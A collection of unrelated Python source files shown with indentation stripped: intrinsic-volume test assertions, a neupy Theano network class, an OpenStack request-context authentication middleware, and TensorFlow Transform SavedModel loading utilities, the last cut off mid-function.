e = intvol.EC3d
p = intvol.Lips3d
m = np.zeros((40,)*3, np.int)
D = np.indices(m.shape).astype(np.float)
m[10,10,10] = 1
yield assert_almost_equal, e(m), 1
yield assert_almost_equal, p(D,m), [1,0,0,0]
m = np.zeros((40,)*3, np.int)
m[10,10:14,10] = 1
yield assert_almost_equal, e(m), 1
yield assert_almost_equal, p(D,m), [1,3,0,0]
m = np.zeros((40,)*3, np.int)
m[10,10:14,9:15] = 1
yield assert_almost_equal, e(m), 1
yield assert_almost_equal, p(D,m), [1,8,15,0]
| |
import time
import types
import theano
import theano.sparse
import theano.tensor as T
from neupy.utils import (AttributeKeyDict, asfloat, is_list_of_integers,
format_data, does_layer_accept_1d_feature)
from neupy.layers import BaseLayer, Output, Dropout, Combination
from neupy.layers.utils import generate_layers
from neupy.core.properties import ChoiceProperty
from neupy.layers.connections import LayerConnection, NetworkConnectionError
from neupy.network import errors
from .learning import SupervisedLearning
from .base import BaseNetwork
__all__ = ('ConstructableNetwork',)
def clean_layers(connection):
""" Clean layers connections and format transform them into one format.
Also this function validate layers connections.
Parameters
----------
connection : list, tuple or object
Layers connetion in different formats.
Returns
-------
object
Cleaned layers connection.
"""
if is_list_of_integers(connection):
connection = generate_layers(list(connection))
if isinstance(connection, tuple):
connection = list(connection)
islist = isinstance(connection, list)
if islist and isinstance(connection[0], BaseLayer):
chain_connection = connection.pop()
for layer in reversed(connection):
chain_connection = LayerConnection(layer, chain_connection)
connection = chain_connection
elif islist and isinstance(connection[0], LayerConnection):
pass
if not isinstance(connection.output_layer, Output):
raise NetworkConnectionError("Final layer must be Output class "
"instance.")
return connection
def create_input_variable(input_layer, variable_name):
""" Create input variable based on input layer information.
Parameters
----------
input_layer : object
variable_name : str
Returns
-------
Theano variable
"""
dim_to_variable_type = {
2: T.matrix,
3: T.tensor3,
4: T.tensor4,
}
if isinstance(input_layer, Combination):
ndim = 3
elif hasattr(input_layer, 'ndim') and not input_layer.ndim is None:
ndim = input_layer.ndim
else:
ndim = input_layer.weight.ndim
if ndim not in dim_to_variable_type:
raise ValueError("Layer's input needs to be 2, 3 or 4 dimensional. "
"Found {}".format(ndim))
variable_type = dim_to_variable_type[ndim]
return variable_type(variable_name)
def create_output_variable(error_function, variable_name):
""" Create output variable based on error function.
Parameters
----------
error_function : function
variable_name : str
Returns
-------
Theano variable
"""
# TODO: Solution is not user friendly. I need to find
# better solution later.
if hasattr(error_function, 'expected_dtype'):
network_output_dtype = error_function.expected_dtype
else:
network_output_dtype = T.matrix
return network_output_dtype(variable_name)
def find_input_layer(layers):
""" Function checks list of layer and finds an input layer.
Parameters
----------
layers : iterative object
Ordered list of layers.
Returns
-------
BaseLayer instance or None
Function will return input layer if it exists in the specified
connection structure. Otherwise, output will be equal to ``None``.
"""
for layer in layers:
if not isinstance(layer, Dropout):
return layer
class ErrorFunctionProperty(ChoiceProperty):
""" Property that helps select error function from
available or define a new one.
Parameters
----------
{ChoiceProperty.choices}
{BaseProperty.default}
{BaseProperty.required}
"""
def __set__(self, instance, value):
if isinstance(value, types.FunctionType):
return super(ChoiceProperty, self).__set__(instance, value)
return super(ErrorFunctionProperty, self).__set__(instance, value)
def __get__(self, instance, value):
founded_value = super(ChoiceProperty, self).__get__(instance, value)
if isinstance(founded_value, types.FunctionType):
return founded_value
return super(ErrorFunctionProperty, self).__get__(instance,
founded_value)
class ConstructableNetwork(SupervisedLearning, BaseNetwork):
""" Class contains functionality that helps work with network that have
constructable layers architecture.
Parameters
----------
connection : list, tuple or object
Network architecture. That variables could be described in
different ways. The simples one is a list or tuple that contains
integers. Each integer describe layer input size. For example,
``(2, 4, 1)`` means that network will have 3 layers with 2 input
units, 4 hidden units and 1 output unit. The one limitation of that
method is that all layers automaticaly would with sigmoid actiavtion
function. Other way is just a list of ``BaseLayer``` class
instances. For example: ``[Tanh(2), Relu(4), Output(1)].
And the most readable one is just layer pipeline
``Tanh(2) > Relu(4) > Output(1)``.
error : {{'mse', 'rmse', 'mae', 'categorical_crossentropy', \
'binary_crossentropy'}} or function
Function that calculate prediction error.
Defaults to ``mse``.
* ``mae`` - Mean Absolute Error.
* ``mse`` - Mean Squared Error.
* ``rmse`` - Root Mean Squared Error.
* ``msle`` - Mean Squared Logarithmic Error.
* ``rmsle`` - Root Mean Squared Logarithmic Error.
* ``categorical_crossentropy`` - Categorical cross entropy.
* ``binary_crossentropy`` - Binary cross entropy.
* Custom function that accept two mandatory arguments.
The first one is expected value and the second one is
predicted value. Example: ``custom_func(expected, predicted)``
{BaseNetwork.step}
{BaseNetwork.show_epoch}
{BaseNetwork.shuffle_data}
{BaseNetwork.epoch_end_signal}
{BaseNetwork.train_end_signal}
{Verbose.verbose}
Attributes
----------
{BaseNetwork.errors}
{BaseNetwork.train_errors}
{BaseNetwork.validation_errors}
{BaseNetwork.last_epoch}
"""
error = ErrorFunctionProperty(default='mse', choices={
'mae': errors.mae,
'mse': errors.mse,
'rmse': errors.rmse,
'msle': errors.msle,
'rmsle': errors.rmsle,
'binary_crossentropy': errors.binary_crossentropy,
'categorical_crossentropy': errors.categorical_crossentropy,
})
def __init__(self, connection, *args, **kwargs):
self.connection = clean_layers(connection)
self.all_layers = list(self.connection)
self.layers = self.all_layers[:-1]
self.input_layer = find_input_layer(self.layers)
self.hidden_layers = self.layers[1:]
self.output_layer = self.all_layers[-1]
self.init_layers()
super(ConstructableNetwork, self).__init__(*args, **kwargs)
self.logs.message("THEANO", "Initializing Theano variables and "
"functions.")
start_init_time = time.time()
self.variables = AttributeKeyDict(
network_input=create_input_variable(
self.input_layer, variable_name='x'
),
network_output=create_output_variable(
self.error, variable_name='y'
),
)
self.methods = AttributeKeyDict()
self.init_variables()
self.init_methods()
finish_init_time = time.time()
self.logs.message("THEANO", "Initialization finished sucessfully. "
"It took {:.2f} seconds"
"".format(finish_init_time - start_init_time))
def init_variables(self):
""" Initialize Theano variables.
"""
network_input = self.variables.network_input
network_output = self.variables.network_output
train_prediction = prediction = network_input
for layer in self.layers:
if not isinstance(layer, Dropout):
prediction = layer.output(prediction)
layer.prediction = prediction
train_prediction = layer.output(train_prediction)
self.variables.update(
step=theano.shared(name='step', value=asfloat(self.step)),
epoch=theano.shared(name='epoch', value=asfloat(self.last_epoch)),
prediction_func=prediction,
train_prediction_func=train_prediction,
error_func=self.error(network_output, train_prediction),
validation_error_func=self.error(network_output, prediction),
)
def init_methods(self):
""" Initialize all methods that needed for prediction and
training procedures.
"""
network_input = self.variables.network_input
network_output = self.variables.network_output
self.methods.predict_raw = theano.function(
inputs=[self.variables.network_input],
outputs=self.variables.prediction_func
)
self.methods.train_epoch = theano.function(
inputs=[network_input, network_output],
outputs=self.variables.error_func,
updates=self.init_train_updates(),
)
self.methods.prediction_error = theano.function(
inputs=[network_input, network_output],
outputs=self.variables.validation_error_func
)
def init_layers(self):
""" Initialize layers in the same order as they were list in
network initialization step.
"""
for layer in self.layers:
layer.initialize()
def init_train_updates(self):
""" Initialize train function update in Theano format that
would be trigger after each training epoch.
"""
updates = []
for layer in self.layers:
updates.extend(self.init_layer_updates(layer))
return updates
def init_layer_updates(self, layer):
""" Initialize train function update in Theano format that
would be trigger after each training epoch for each layer.
Parameters
----------
layer : object
Any layer that inherit from BaseLayer class.
Returns
-------
list
Update that excaptable by ``theano.function``. There should be
a lits that contains tuples with 2 elements. First one should
be parameter that would be updated after epoch and the second one
should update rules for this parameter. For example parameter
could be a layer's weight and bias.
"""
updates = []
for parameter in layer.parameters:
updates.extend(self.init_param_updates(layer, parameter))
return updates
def init_param_updates(self, layer, parameter):
""" Initialize parameter updates.
Parameters
----------
layer : object
Any layer that inherit from BaseLayer class.
parameter : object
Usualy it is a weight or bias.
Returns
-------
list
List of updates related to the specified parameter.
"""
return []
def format_input_data(self, input_data):
""" Input data format is depence on the input layer
structure.
Parameters
----------
input_data : array-like or None
Returns
-------
array-like or None
Function returns formatted array.
"""
if input_data is not None:
is_feature1d = does_layer_accept_1d_feature(self.input_layer)
return format_data(input_data, is_feature1d)
def format_target_data(self, target_data):
""" Target data format is depence on the output layer
structure.
Parameters
----------
target_data : array-like or None
Returns
-------
array-like or None
Function returns formatted array.
"""
if target_data is not None:
is_feature1d = does_layer_accept_1d_feature(self.output_layer)
return format_data(target_data, is_feature1d)
def prediction_error(self, input_data, target_data):
""" Calculate prediction accuracy for input data.
Parameters
----------
input_data : array-like
target_data : array-like
Returns
-------
float
Prediction error.
"""
return self.methods.prediction_error(
self.format_input_data(input_data),
self.format_target_data(target_data)
)
def predict_raw(self, input_data):
""" Make raw prediction without final layer postprocessing step.
Parameters
----------
input_data : array-like
Returns
-------
array-like
"""
input_data = self.format_input_data(input_data)
return self.methods.predict_raw(input_data)
def predict(self, input_data):
""" Return prediction results for the input data. Output result also
include postprocessing step related to the final layer that
transform output to convenient format for end-use.
Parameters
----------
input_data : array-like
Returns
-------
array-like
"""
raw_prediction = self.predict_raw(input_data)
return self.output_layer.output(raw_prediction)
def on_epoch_start_update(self, epoch):
""" Function would be trigger before run all training procedure
related to the current epoch.
Parameters
----------
epoch : int
Current epoch number.
"""
super(ConstructableNetwork, self).on_epoch_start_update(epoch)
self.variables.epoch.set_value(epoch)
def train(self, input_train, target_train, input_test=None,
target_test=None, *args, **kwargs):
""" Trains neural network.
"""
return super(ConstructableNetwork, self).train(
self.format_input_data(input_train),
self.format_target_data(target_train),
self.format_input_data(input_test),
self.format_target_data(target_test),
*args, **kwargs
)
def train_epoch(self, input_train, target_train):
""" Trains neural network over one epoch.
Parameters
----------
input_data : array-like
target_data : array-like
Returns
-------
float
Prediction error.
"""
return self.methods.train_epoch(input_train, target_train)
def architecture(self):
""" Shows network's architecture in the terminal if
``verbose`` parameter is equal to ``True``.
"""
self.logs.title("Network's architecture")
for i, layer in enumerate(self.all_layers, start=1):
self.logs.write("{:>3}. {}".format(i, str(layer)))
self.logs.newline()
def __repr__(self):
return "{}({}, {})".format(self.class_name(), self.connection,
self._repr_options())
| |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient.auth.identity import access as access_plugin
from keystoneclient.auth.identity import v3
from keystoneclient.auth import token_endpoint
from oslo_config import cfg
from oslo_context import context
from chef_validator.common import log as logging
from oslo_middleware import request_id as oslo_request_id
from oslo_utils import importutils
import oslo_messaging
import six
from chef_validator.common import exception
from chef_validator.common.i18n import _LE
from chef_validator.common import wsgi
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class RequestContext(context.RequestContext):
"""
Stores information about the security context under which the user
accesses the system, as well as additional request information.
"""
def __init__(self, auth_token=None, username=None, password=None,
aws_creds=None, tenant=None, user_id=None,
tenant_id=None, auth_url=None, roles=None, is_admin=None,
read_only=False, show_deleted=False,
overwrite=True, trust_id=None, trustor_user_id=None,
request_id=None, auth_token_info=None, region_name=None,
auth_plugin=None, **kwargs):
"""
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
super(RequestContext, self).__init__(
auth_token=auth_token,
user=username,
tenant=tenant,
is_admin=is_admin,
read_only=read_only,
show_deleted=show_deleted,
request_id=request_id
)
self.username = username
self.user_id = user_id
self.password = password
self.region_name = region_name
self.aws_creds = aws_creds
self.tenant_id = tenant_id
self.auth_token_info = auth_token_info
self.auth_url = auth_url
self.roles = roles or []
self._session = None
self._clients = None
self.trust_id = trust_id
self.trustor_user_id = trustor_user_id
self._auth_plugin = auth_plugin
self.is_admin = is_admin
def to_dict(self):
user_idt = '{user} {tenant}'.format(user=self.username or '-',
tenant=self.tenant or '-')
return {'auth_token': self.auth_token,
'username': self.username,
'user_id': self.user_id,
'password': self.password,
'aws_creds': self.aws_creds,
'tenant': self.tenant,
'tenant_id': self.tenant_id,
'trust_id': self.trust_id,
'trustor_user_id': self.trustor_user_id,
'auth_token_info': self.auth_token_info,
'auth_url': self.auth_url,
'roles': self.roles,
'is_admin': self.is_admin,
'user': self.user,
'request_id': self.request_id,
'show_deleted': self.show_deleted,
'region_name': self.region_name,
'user_identity': user_idt}
@classmethod
def from_dict(cls, values):
return cls(**values)
@property
def _keystone_v3_endpoint(self):
if self.auth_url:
auth_uri = self.auth_url
else:
importutils.import_module('keystonemiddleware.auth_token')
auth_uri = CONF.keystone_authtoken.auth_uri
return auth_uri.replace('v2.0', 'v3')
def _create_auth_plugin(self):
if self.trust_id:
importutils.import_module('keystonemiddleware.auth_token')
username = CONF.keystone_authtoken.admin_user
password = CONF.keystone_authtoken.admin_password
return v3.Password(username=username,
password=password,
user_domain_id='default',
auth_url=self._keystone_v3_endpoint,
trust_id=self.trust_id)
if self.auth_token_info:
auth_ref = access.AccessInfo.factory(body=self.auth_token_info,
auth_token=self.auth_token)
return access_plugin.AccessInfoPlugin(
auth_url=self._keystone_v3_endpoint,
auth_ref=auth_ref)
if self.auth_token:
# FIXME(jamielennox): This is broken but consistent. If you
# only have a token but don't load a service catalog then
# url_for wont work. Stub with the keystone endpoint so at
# least it might be right.
return token_endpoint.Token(
endpoint=self._keystone_v3_endpoint,
token=self.auth_token
)
if self.password:
return v3.Password(
username=self.username,
password=self.password,
project_name=self.tenant,
project_id=self.tenant_id,
user_domain_id='default',
project_domain_id='default',
auth_url=self._keystone_v3_endpoint
)
LOG.error(
_LE("Keystone v3 API connection failed, no password "
"trust or auth_token!")
)
raise exception.AuthorizationFailure()
@property
def auth_plugin(self):
if not self._auth_plugin:
self._auth_plugin = self._create_auth_plugin()
return self._auth_plugin
def get_admin_context(show_deleted=False):
return RequestContext(is_admin=True, show_deleted=show_deleted)
class ContextMiddleware(wsgi.Middleware):
def __init__(self, app, conf, **local_conf):
# Determine the context class to use
self.ctxcls = RequestContext
if 'context_class' in local_conf:
self.ctxcls = importutils.import_class(local_conf['context_class'])
super(ContextMiddleware, self).__init__(app)
def make_context(self, *args, **kwargs):
"""
Create a context with the given arguments.
:param kwargs:
:param args:
"""
return self.ctxcls(*args, **kwargs)
def process_request(self, req):
"""
Extract any authentication information in the request and
construct an appropriate context from it.
:param req:
"""
headers = req.headers
environ = req.environ
try:
username = None
password = None
aws_creds = None
if headers.get('X-Auth-User') is not None:
username = headers.get('X-Auth-User')
password = headers.get('X-Auth-Key')
elif headers.get('X-Auth-EC2-Creds') is not None:
aws_creds = headers.get('X-Auth-EC2-Creds')
user_id = headers.get('X-User-Id')
token = headers.get('X-Auth-Token')
tenant = headers.get('X-Project-Name')
tenant_id = headers.get('X-Project-Id')
region_name = headers.get('X-Region-Name')
auth_url = headers.get('X-Auth-Url')
roles = headers.get('X-Roles')
if roles is not None:
roles = roles.split(',')
token_info = environ.get('keystone.token_info')
auth_plugin = environ.get('keystone.token_auth')
req_id = environ.get(oslo_request_id.ENV_REQUEST_ID)
except Exception:
raise exception.NotAuthenticated()
req.context = self.make_context(
auth_token=token,
tenant=tenant,
tenant_id=tenant_id,
aws_creds=aws_creds,
username=username,
user_id=user_id,
password=password,
auth_url=auth_url,
roles=roles,
request_id=req_id,
auth_token_info=token_info,
region_name=region_name,
auth_plugin=auth_plugin
)
LOG.debug("Context successfully injected")
def ContextMiddleware_filter_factory(global_conf, **local_conf):
"""
Factory method for paste.deploy
:param local_conf:
:param global_conf:
"""
conf = global_conf.copy()
conf.update(local_conf)
def filter(app):
return ContextMiddleware(app, conf)
return filter
def request_context(func):
@six.wraps(func)
def wrapped(self, ctx, *args, **kwargs):
if ctx is not None and not isinstance(ctx, context.RequestContext):
ctx = context.RequestContext.from_dict(ctx.to_dict())
try:
return func(self, ctx, *args, **kwargs)
except exception.OpenstackException:
raise oslo_messaging.rpc.dispatcher.ExpectedException()
return wrapped
| |
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions to save and load from SavedModels in TF 2.x."""
from typing import Any, Dict, Iterable, Mapping, Tuple, Union
import tensorflow as tf
from tensorflow_transform import annotators
from tensorflow_transform import common_types
from tensorflow_transform import graph_tools
from tensorflow_transform import tf2_utils
from tensorflow_transform import tf_utils
from tensorflow_transform.py_func import pyfunc_helper
from tensorflow_transform.saved import constants
from tensorflow_transform.saved import saved_model_loader
from tensorflow_transform.saved import saved_transform_io
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.ops import lookup_ops
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util import object_identity
# pylint: enable=g-direct-tensorflow-import
def _restore_from_v1_saved_model(
restored_function: function.ConcreteFunction, saved_model_dir: str
) -> Tuple[function.ConcreteFunction, Mapping[str, Any], Mapping[
str, common_types.TensorType]]:
"""Restores an exported TF1 compat SavedModel."""
saved_model = saved_model_loader.parse_saved_model(saved_model_dir)
meta_graph_def = saved_model_loader.choose_meta_graph_def_and_raise(
saved_model)
signature = meta_graph_def.signature_def[constants.TRANSFORM_SIGNATURE]
# Re-register pyfuncs, if any.
graph_def = pyfunc_helper.register_pyfuncs_from_saved_transform(
restored_function.graph, meta_graph_def, loaded_in_tf2=True)
if graph_def is None:
return (restored_function, signature.inputs,
restored_function.structured_outputs)
inputs = [t.name for t in restored_function.graph.inputs]
outputs = [t.name for t in restored_function.graph.outputs]
wrapped = wrap_function.function_from_graph_def(graph_def, inputs, outputs)
structured_outputs = (
tf.nest.pack_sequence_as(
restored_function.structured_outputs,
wrapped.outputs,
expand_composites=True))
wrapped = wrapped.prune(wrapped.inputs, structured_outputs)
return (wrapped, signature.inputs, wrapped.structured_outputs)
def _as_operation(op_or_tensor: Union[tf.Operation, tf.Tensor]) -> tf.Operation:
if isinstance(op_or_tensor, tf.Tensor):
return op_or_tensor.op
return op_or_tensor
def _get_component_tensors(
tensor: Union[tf.Tensor, composite_tensor.CompositeTensor]
) -> Iterable[tf.Tensor]:
"""Get all component tensors.
Args:
tensor: A `Tensor` or `CompositeTensor`.
Returns:
All `Tensor` components of `tensor`.
Raises:
ValueError if supplied `tensor` parameter is neither a `Tensor` nor a
`CompositeTensor`.
"""
if isinstance(tensor, tf.Tensor):
return [tensor]
elif isinstance(tensor, composite_tensor.CompositeTensor):
return tf.nest.flatten(tensor, expand_composites=True)
else:
raise ValueError(
'Unsupported tensor. Arg `tensor` is neither a `Tensor` nor a '
f'`CompositeTensor`: {tensor}.')
def _get_output_to_inputs_map(
output_signature: Mapping[str, common_types.TensorType]
) -> Dict[str, Iterable[tf.Tensor]]:
"""Gets all graph inputs that the tensors in output_signature depend on."""
result = {}
for name, output in output_signature.items():
components = _get_component_tensors(output)
sinks = [_as_operation(component) for component in components]
# Ignore control dependencies when walking the graph as we only care about
# which user defined inputs this output depends on.
result[name] = graph_tools.retrieve_sources(
sinks, ignore_control_dependencies=True)
return result
class SavedModelLoader:
"""Handles a SavedModel exported using TF 1.x APIs in TF 2.x."""
def __init__(self, saved_model_dir: str):
"""Init method for SavedModelLoader.
Args:
saved_model_dir: A SavedModel directory providing a transform graph. The
MetaGraphDef and signature are selected from the SavedModel using keys
defined in `../constants.py` ('transform' and 'transform_signature',
respectively).
"""
# TODO(b/160294509): Stop using tf.compat.v2 when TF1.15 support is
# dropped.
imported = tf.compat.v2.saved_model.load(saved_model_dir)
load_v2_in_compat = constants.TRANSFORM_SIGNATURE in imported.signatures
if load_v2_in_compat:
restored_function = imported.signatures[constants.TRANSFORM_SIGNATURE]
wrapped, structured_inputs, structured_outputs = (
_restore_from_v1_saved_model(restored_function, saved_model_dir))
else:
# transform_fn is now a ConcreteFunction, but was a tf.function. We need
# to handle both to maintain backward compatiblity. If it's a tf.function,
# since `input_signature` was specified when exporting the tf function to
# `SavedModel`, there should be exactly one concrete function present on
# loading the `SavedModel`.
if hasattr(imported.transform_fn, 'concrete_functions'):
concrete_functions = imported.transform_fn.concrete_functions
assert len(concrete_functions) == 1, concrete_functions
wrapped = concrete_functions[0]
else:
wrapped = imported.transform_fn
func_graph = wrapped.graph
structured_inputs = (
tf2_utils.get_structured_inputs_from_func_graph(func_graph))
structured_outputs = tf.nest.pack_sequence_as(
func_graph.structured_outputs,
func_graph.outputs,
expand_composites=True)
outputs_to_inputs_map = _get_output_to_inputs_map(structured_outputs)
self._initialize(load_v2_in_compat, imported, wrapped, structured_inputs,
structured_outputs, outputs_to_inputs_map)
saved_transform_io._maybe_register_addon_ops() # pylint: disable=protected-access
def _initialize(self, load_v2_in_compat, imported, wrapped, structured_inputs,
structured_outputs, outputs_to_inputs_map):
"""Initializes all class arguments."""
self._load_v2_in_compat = load_v2_in_compat
self._imported = imported
self._wrapped_function = wrapped
self._func_graph = self._wrapped_function.graph
self._structured_inputs = structured_inputs
self._structured_outputs = structured_outputs
self._output_to_inputs_map = outputs_to_inputs_map
self._sorted_unfed_input_keys = None
self._wrapped_function_finalized = None
self._is_finalized = False
@property
def load_v2_in_compat(self):
return self._load_v2_in_compat
@property
def structured_outputs(self):
return self._structured_outputs
def _get_feeds(self, unfed_input_keys: Iterable[str]) -> Iterable[tf.Tensor]:
"""Returns set of tensors that will be fed."""
result = object_identity.ObjectIdentitySet(self._func_graph.inputs)
for input_key in unfed_input_keys:
unfed_input_components = _get_component_tensors(
self._structured_inputs[input_key])
result = result.difference(unfed_input_components)
return result
def _get_unfed_input_keys(self,
input_tensor_keys: Iterable[str]) -> Iterable[str]:
return set(self._structured_inputs.keys()).difference(input_tensor_keys)
def _get_fetches(
self, feeds: Iterable[tf.Tensor]) -> Dict[str, common_types.TensorType]:
"""Returns set of tensors that can be fetched when `feeds` is supplied."""
result = {}
for name, output in self._structured_outputs.items():
extra_sources = self._output_to_inputs_map[name].difference(feeds)
# If output does not depend on an input placeholder that is not being fed,
# add it to fetches.
if not extra_sources.difference(self._func_graph.internal_captures):
result[name] = output
return result
def _get_fetches_keys(self, feeds: Iterable[tf.Tensor]) -> Iterable[str]:
return self._get_fetches(feeds).keys()
def _get_missing_inputs(
self, unfed_input_keys: Iterable[str],
batch_size: int) -> Dict[str, common_types.TensorType]:
"""Supplies inputs for `unfed_input_keys`."""
result = {}
if unfed_input_keys:
result = (
tf2_utils.supply_missing_inputs(self._structured_inputs, batch_size,
unfed_input_keys))
return result
def _apply_v1_transform_model_in_v2(
self, logical_input_map: Mapping[str, common_types.TensorType]
) -> Dict[str, common_types.TensorType]:
"""Applies a V1 transform graph to dictionary of (Composite)Tensors.
This method applies the transformation graph as a pruned function to the
`logical_input_map`.
It prunes the function loaded from the SavedModel to return only outputs
that can be computed from the keys provided in `logical_input_map`.
Args:
logical_input_map: a dict of logical name to Tensor. The logical names
must be a subset of those in the input signature of the transform graph,
and the corresponding Tensors must have the expected types and shapes.
Returns:
A dict of logical name to Tensor, as provided by the output signature of
the transform graph.
"""
input_map = (
saved_transform_io._expand_input_map( # pylint: disable=protected-access
logical_input_map, self._structured_inputs))
feeds = []
pruned_input_args = []
for name in input_map:
tensor = self._func_graph.get_tensor_by_name(name)
try:
tensor.shape.assert_is_compatible_with(input_map[name].shape)
except ValueError as e:
raise ValueError('{}: {}'.format(name, e))
feeds.append(tensor)
pruned_input_args.append(input_map[name])
fetches = self._get_fetches(feeds)
pruned = self._wrapped_function.prune(feeds, fetches)
result = pruned(*pruned_input_args)
# TODO(b/163329414): Remove set_shape when calling pruned no longer produces
# tensors with unknown shapes.
for name, output in fetches.items():
if hasattr(result[name], 'set_shape'):
result[name].set_shape(output.shape)
return result
def _format_input_map_as_tensors(self, input_map):
"""Returns a map from string to `tf.Tensor` or `CompositeTensor`."""
result = {}
for key, value in input_map.items():
if isinstance(value, (tf.Tensor, composite_tensor.CompositeTensor)):
result[key] = value
else:
result[key] = tf.convert_to_tensor(value)
return result
def _apply_v2_transform_model_finalized(
self, logical_input_map: Mapping[str, common_types.TensorType]
) -> Dict[str, common_types.TensorType]:
"""Applies a V2 transform graph to dictionary of (Composite)Tensors.
This method applies the transformation graph to the `logical_input_map` to
return only outputs that can be computed from the keys provided in
`logical_input_map`. It assumes that self.finalize has been called before
this method is invoked.
Args:
logical_input_map: a dict of logical name to Tensor. The logical names
must be a subset of those in the input signature of the transform graph,
and the corresponding Tensors must have the expected types and shapes.
Returns:
A dict of logical name to Tensor, as provided by the output signature of
the transform graph.
"""
# Assert that the same keys are fed as this model was finalized with.
unfed_input_keys = self._get_unfed_input_keys(logical_input_map.keys())
assert sorted(unfed_input_keys) == self._sorted_unfed_input_keys
modified_inputs = self._format_input_map_as_tensors(logical_input_map)
return self._wrapped_function_finalized(modified_inputs)
def _apply_v2_transform_model(
self, logical_input_map: Mapping[str, common_types.TensorType]
) -> Dict[str, common_types.TensorType]:
"""Applies a V2 transform graph to dictionary of (Composite)Tensors.
This method applies the transformation graph to the `logical_input_map` to
return only outputs that can be computed from the keys provided in
`logical_input_map`.
Args:
logical_input_map: a dict of logical name to Tensor. The logical names
must be a subset of those in the input signature of the transform graph,
and the corresponding Tensors must have the expected types and shapes.
Returns:
A dict of logical name to Tensor, as provided by the output signature of
the transform graph.
"""
unfed_input_keys = self._get_unfed_input_keys(logical_input_map.keys())
feeds = self._get_feeds(unfed_input_keys)
modified_inputs = self._format_input_map_as_tensors(logical_input_map)
if unfed_input_keys:
batch_size = 1
if logical_input_map:
an_input = next(iter(logical_input_map.values()))
if isinstance(an_input, tf.RaggedTensor):
batch_size = an_input.bounding_shape(axis=0)
elif tf.shape(an_input)[0] is not None:
batch_size = tf.shape(an_input)[0]
missing_inputs = self._get_missing_inputs(unfed_input_keys, batch_size)
modified_inputs.update(missing_inputs)
flattened_inputs = tf.nest.flatten(modified_inputs, expand_composites=True)
# self._wrapped_function.inputs may be longer than flattened_inputs as it
# also contains captured inputs. However, we only want the user inputs here
# so we don't assert equal length.
for input_t, wrapped_input in zip(flattened_inputs,
self._wrapped_function.inputs):
try:
wrapped_input.shape.assert_is_compatible_with(input_t.shape)
except ValueError as e:
raise ValueError('{}: {}'.format(input_t, e))
transformed_features = self._wrapped_function(*flattened_inputs)
fetches_keys = self._get_fetches_keys(feeds)
return {key: transformed_features[key] for key in fetches_keys}
def apply_transform_model(
self, logical_input_map: Mapping[str, common_types.TensorType]
) -> Dict[str, common_types.TensorType]:
"""Applies a transform graph to dictionary of (Composite)Tensors.
Args:
logical_input_map: a dict of logical name to Tensor. The logical names
must be a subset of those in the input signature of the transform graph,
and the corresponding Tensors must have the expected types and shapes.
Returns:
A dict of logical name to Tensor, as provided by the output signature of
the transform graph.
"""
unexpected_inputs = (
set(logical_input_map.keys()) - set(self._structured_inputs.keys()))
if unexpected_inputs:
raise ValueError(
'Unexpected inputs to transform: {}'.format(unexpected_inputs))
if self.load_v2_in_compat:
return self._apply_v1_transform_model_in_v2(logical_input_map)
elif self._is_finalized:
return self._apply_v2_transform_model_finalized(logical_input_map)
else:
return self._apply_v2_transform_model(logical_input_map)
def _finalize_wrapped_function(
self, unfed_input_keys: Iterable[str],
fetches_keys: Iterable[str]) -> function.ConcreteFunction:
"""Constructs a function that can be invoked without `unfed_input_keys`."""
original_input_signature = (
self._wrapped_function.structured_input_signature[0][0])
input_signature = {
k: v
for k, v in original_input_signature.items()
if k not in unfed_input_keys
}
@tf.function(input_signature=[input_signature], autograph=False)
def wrapped_finalized(inputs):
missing_inputs = self._get_missing_inputs(unfed_input_keys, batch_size=1)
# Directly modifying inputs is not allowed in a tf.function. Hence, we
# make a deep copy here.
inputs_copy = tf_utils.copy_tensors(inputs)
inputs_copy.update(missing_inputs)
flattened_inputs = tf.nest.flatten(inputs_copy, expand_composites=True)
transformed_features = self._wrapped_function(*flattened_inputs)
return {key: transformed_features[key] for key in fetches_keys}
return wrapped_finalized.get_concrete_function()
# TODO(b/177672051): Consider calling finalize in the TransformFeaturesLayer.
def finalize(self, input_tensor_keys: Iterable[str],
output_tensor_keys: Iterable[str]):
"""Finalizes the set of inputs with which this SavedModel will be called.
Note: This is not Thread-safe. Should be called prior to any calls to
`apply_transform_model`.
Args:
input_tensor_keys: Set of input keys with which the SavedModel will be
called.
output_tensor_keys: Set of output keys that should be returned by the
SavedModel.
"""
self._sorted_unfed_input_keys = sorted(
self._get_unfed_input_keys(input_tensor_keys))
feeds = self._get_feeds(self._sorted_unfed_input_keys)
unexpected_outputs = (
set(output_tensor_keys) - set(self._get_fetches_keys(feeds)))
if unexpected_outputs:
raise ValueError(
'Unexpected output keys requested: {}'.format(unexpected_outputs))
self._wrapped_function_finalized = self._finalize_wrapped_function(
self._sorted_unfed_input_keys, sorted(output_tensor_keys))
self._is_finalized = True
# TODO(b/177606209): Remove once TF supports saving optimized functions.
# TODO(b/169666856): WrappedFunction.prune does not support composite tensors.
# Hence, add additional handling when supporting composite tensors in TFT.
def optimize_concrete_function(
concrete_function: function.ConcreteFunction,
strip_control_dependencies: bool) -> wrap_function.WrappedFunction:
"""Returns optimized function with same signature as `concrete_function`."""
wrapped_fn = wrap_function.WrappedFunction(
concrete_function.graph,
variable_holder=wrap_function.VariableHolder(share_variables=True))
fetches = concrete_function.structured_outputs
if strip_control_dependencies:
